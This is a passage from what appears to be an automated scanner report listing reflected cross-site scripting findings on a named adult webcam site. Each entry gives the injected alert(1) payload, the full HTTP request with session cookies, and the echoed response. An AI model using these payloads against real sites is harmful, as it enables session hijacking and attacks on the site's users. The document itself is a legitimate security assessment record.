<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.499. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d76ad"><a>13636193c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:35 GMT Connection: close Content-Length: 226523 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1"> ...[SNIP]...
4.500. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145d0'-alert(1)-'7c612653421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:19 GMT Connection: close Content-Length: 27791 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a ...[SNIP]...
4.501. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b83"><a>3293a7e18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:10 GMT Connection: close Content-Length: 27644 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.502. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/cams-aroundthehouse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f55"><a>53aa4db76a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:00 GMT Connection: close Content-Length: 33620 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.503. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/cams-aroundthehouse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1145a'-alert(1)-'9eeece25a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:16 GMT Connection: close Content-Length: 33767 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.504. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/caught-on-cam/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3af4"><a>c33137ced61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:56 GMT Connection: close Content-Length: 26092 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.505. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/caught-on-cam/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9d8'-alert(1)-'484051df056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 26239 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
4.506. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7330d'-alert(1)-'69a435aad31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:18 GMT Connection: close Content-Length: 116890 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.507. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29d6"><a>e94ae201611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
